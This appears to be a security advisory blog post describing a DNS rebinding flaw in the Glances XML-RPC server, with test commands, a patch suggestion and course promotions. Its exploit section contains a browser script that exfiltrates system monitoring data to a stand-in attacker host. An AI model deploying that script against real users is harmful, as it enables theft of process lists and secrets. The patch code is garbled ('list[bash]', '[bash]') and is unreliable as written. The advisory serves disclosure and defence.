Listen to this Post
The Glances XML‑RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP `Host` header, making it vulnerable to DNS rebinding attacks. While CVE‑2026‑32632 (patched in 4.5.2) added `TrustedHostMiddleware` to the REST/WebUI server and the MCP server received equivalent protection in 4.5.1, the XML‑RPC server received neither fix and has no `allowed-hosts` configuration key. The `GlancesXMLRPCHandler` class inherits from Python’s `xmlrpc.server.SimpleXMLRPCRequestHandler` and does not override `parse_request()` to inspect or validate the `Host` header. In contrast, the REST API applies `TrustedHostMiddleware` with an allowlist, and the MCP server uses TransportSecuritySettings(allowed_hosts=...). No `xmlrpc_allowed_hosts` or equivalent setting exists in glances.conf, so the server accepts any `Host` value on every incoming request.
An attacker can exploit this by registering a domain (e.g., attacker.example.com) with a low‑TTL DNS record initially pointing to their own server. They then serve a malicious page that, after the TTL expires and the DNS rebinds to the target’s IP (e.g., 127.0.0.1), sends a `fetch()` request to http://attacker.example.com:61209/RPC2` with the spoofed `Host: attacker.example.com` header. Because the XML‑RPC server does not validate theHost, it accepts the request and returns the full system monitoring dataset. The attack is amplified by the companion CORS wildcard issue (CVE‑2026‑33533): the server sends `Access-Control-Allow-Origin: ` on every response, allowing the victim’s browser to read the cross‑origin response. Together, these flaws enable silent exfiltration of hostname, OS version, full process list with command‑line arguments (often containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, open file descriptors, listening ports, and container metadata. The attack requires no special `glances.conf` settings and works against default installations bound to loopback, LAN, or public IPs.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: ...... Glances XML‑RPC (glances -s)
Version: ........ ≤ 4.5.5_dev1 (pre‑patch)
Vulnerability :.. DNS Rebinding / Host Validation Bypass
Severity: ....... High (CVSS 5.9–7.5)
date: ........... 2026‑03‑29
<h2 style="color: blue;">Prediction: ..... Patch expected by 2026‑04‑15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Step 1 – Start the vulnerable XML‑RPC server
glances -s -p 61209
Step 2 – Confirm arbitrary Host header is accepted (should return 200 OK)
curl -s -D - -X POST "http://127.0.0.1:61209/RPC2" \
-H "Host: attacker.example.com" \
-H "Content-Type: text/plain" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Step 3 – Compare with patched REST API (returns 400 Bad Request)
glances -w -p 61210 --webui-port 61210
curl -s -o /dev/null -w "%{http_code}\n" \
"http://127.0.0.1:61210/api/4/status" \
-H "Host: attacker.example.com"
Step 4 – Verify absence of Host check in source code
python3 -c "
import sys, inspect
sys.path.insert(0, '/path/to/glances')
import glances.server as s
src = inspect.getsource(s.GlancesXMLRPCHandler)
print('Host check present:', 'allowed_hosts' in src or 'Host' in src)
"
Output: Host check present: False
<h2 style="color: blue;">Exploit:</h2>
1. Attacker registers `attacker.example.com` with a 1‑second TTL, initially pointing to their own IP.
2. Victim visitshttp://attacker.example.com`; the page contains:
<script>
async function exfil() {
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
const r = await fetch('http://attacker.example.com:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
});
const data = await r.text();
await fetch('https://collect.attacker.example.com/?d=' + btoa(data));
}
setTimeout(exfil, 5000); // wait for DNS to rebind to 127.0.0.1
</script>
3. After TTL expiry, the DNS resolves to 127.0.0.1; the browser’s `fetch()` is sent to `127.0.0.1:61209` with Host: attacker.example.com.
4. The XML‑RPC server accepts the request and returns the full monitoring dataset.
5. The `Access-Control-Allow-Origin: ` header allows the attacker’s page to read the response and exfiltrate it.
Protection:
- Option 1 (Preferred): Add Host validation to `GlancesXMLRPCHandler` by overriding
parse_request():class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI): allowed_hosts: list[bash] = [] populated from config def parse_request(self) -> bool: if not super().parse_request(): return False if self.allowed_hosts: host = self.headers.get('Host', '').split(':')[bash] if host not in self.allowed_hosts: self.send_error(400, 'Bad Request: invalid Host header') return False return TruePopulate `allowed_hosts` from the existing `webui_allowed_hosts` config key to provide a single control knob.
- Option 2: Deprecate and remove the legacy XML‑RPC server; the REST API (
glances -w) offers a superset of functionality with all current security controls.
Impact:
- Confidentiality: High – complete system monitoring data (hostname, OS, kernel, full process list with command‑line arguments, CPU/memory/disk/network stats, open file descriptors, listening ports, Docker/Kubernetes metadata) can be read remotely without credentials.
- Integrity: None – the XML‑RPC API is read‑only.
- Availability: None – no denial‑of‑service component.
- Who is impacted: Any user whose browser can reach a Glances XML‑RPC server and who can be lured to an attacker‑controlled page. This includes loopback, LAN, and public‑IP deployments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
